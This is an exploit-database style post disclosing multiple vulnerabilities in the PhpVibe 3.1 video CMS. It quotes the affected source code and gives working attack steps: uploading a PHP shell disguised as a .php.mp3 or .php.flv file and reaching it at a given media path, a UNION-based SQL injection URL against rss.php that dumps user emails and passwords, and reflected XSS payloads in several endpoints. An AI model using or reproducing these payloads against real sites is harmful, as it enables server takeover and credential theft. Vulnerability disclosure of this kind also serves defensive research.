PhpVibe 3.1 - Multiple Vulnerabilites [Anonymoused]
2013-08-26 10:05:13###########################################################################################
#Exploit Title: PhpVibe 3.1 - Multiple Vulnerabilites
#Product: PhpVibe
#Official site: http://phprevolution.com/
#Risk Level: High
#Exploit Author: Esac
#Last Checked: 23/08/2013
###########################################################################################
+----------+
| OVERVIEW |
+----------+
PhpVibe is a Premium video sharing cms with or without upload. Supports all main video sharing websites like Youtube, Vimeo, Dailymotion, Metacafe� and flv, mp4, mp3 uploads. No ffmpeg required. Upload option can be turned off.
+-----------------------------------------------------------------------------------+
+-------------------------------------+
| Remote Arbitrary File Upload Vuln |
+-------------------------------------+
Affected file : upload.php
...............................................
if ($_FILES['file']['name']!='') {
$fileName= $_FILES['file']['name'];
$fileSize = $_FILES['file']['size'];
$ext = substr($fileName, strrpos($fileName, '.') + 1);
if (in_array($ext,$allowedExts) or empty($allowedExts)) {
if ($fileSize<$maxFileSize or empty($maxFileSize)) {
$target_path = $target_path . basename( $_FILES['file']['name']);
if(move_uploaded_file($_FILES['file']['tmp_name'], $target_path)) {
echo '{"success":true, "file": "'.$target_path.'"}';
vinsert(basename( $_FILES['file']['name']),basename( $_FILES['file']['name']));
} else{
echo '{"success":false, "details": "move_uploaded_file failed"}';
}
} else { echo('{"success":false, "details": "Maximum file size: '.ByteSize($maxFileSize).'."}'); };
} else echo('{"success":false, "details": "File type '.$ext.' not allowed."}');
} else echo '{"success":false, "details": "No file received."}';
real exploitation :
to exploit this vuln , u must be a registred user and go to upload video area
http://server/upload
upload ur evil file as evil.php.mp3 or file.php.mp4 or file.php.flv
Shell access :
http://host/media/flv/month-date-year-time-minute-pm/am-file.php.mp3
Demo :
server/media/flv/august-23-13-5-10-pm-evil.php.flv
+-----------------------------------------------------------------------------------+
+---------------+
| SQL Injection |
+---------------+
PhpVibe is possibly vulnerable to SQL Injection attacks , affected file : rss.php , param : cat
affected code :
//rss.php , line 24
function clean_feed($input)
{
$original = array("<", ">", "&", '"', "'", "<br/>", "<br>");
$replaced = array("<", ">", "&", ""","'", "", "");
$newinput = str_replace($original, $replaced, $input);
return $newinput;
}
echo'<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
<channel>
';
echo '
<title>Download</title>
<description>'.$seo_desc.'</description>
<link>'.$site_url.'</link>
';
if($cat = MK_Request::getQuery('cat')) {
$vbox_result = dbquery("select * from videos WHERE category ='".$cat."' > 0 ORDER BY id DESC limit 0, 30");
} else {
$vbox_result = dbquery("select * from videos WHERE views > 0 ORDER BY id DESC limit 0, 30");
}
while($videosData = mysql_fetch_array($vbox_result))
{
$url = $site_url.'video/'.$videosData["id"].'/'.seo_clean_url($videosData['title']) .'/';
$rss_datetime = $videosData["date"];
echo '
<item>
<title>'.strip_tags($videosData['title']).'</title>
<link><![CDATA['.$url.']]></link>
<guid><![CDATA['.$url.']]></guid>
<pubDate>'.$rss_datetime.'</pubDate>
<description>[CDATA['.clean_feed($videosData["description"]).' ]]</description>
</item>
';
}
echo'</channel>
Poc :
http://server/rss.php?cat=-1+union+select+concat_ws(id,email,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+users--
+--------------------------------------------------------------------------------------+
+-----------+
|XSS Attack |
+-----------+
Multiple XSS vulnerabilities have been detected in phpVibe 3.1
1) Input appended via the URL to show/ is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
exemple :
http://server/show/'">><marquee><h1>XSS</h1></marquee>
2) Input passed to the "email" parameter in forgot-pass.php, login.php, and register.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
The vulnerabilities are reported in version 3.1. Other versions may also be affected.
exemple :
http://server/forgot-pass.php => POST (multipart) input email was set to '">><marquee><h1>XSS</h1></marquee>
http://server/login.php => POST (multipart) input email was set to '">><marquee><h1>XSS</h1></marquee>
http://server/register.php => POST (multipart) input email was set to '">><marquee><h1>XSS</h1></marquee>
+--------------------------------------------------------------------------------------+
Knowledge is not an object , it's a flaw :)
Greetz : White Tarbouch TEAM - Cobra
www.Iss4m.ma
./Issam IEBOUBEN Aka Esac
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.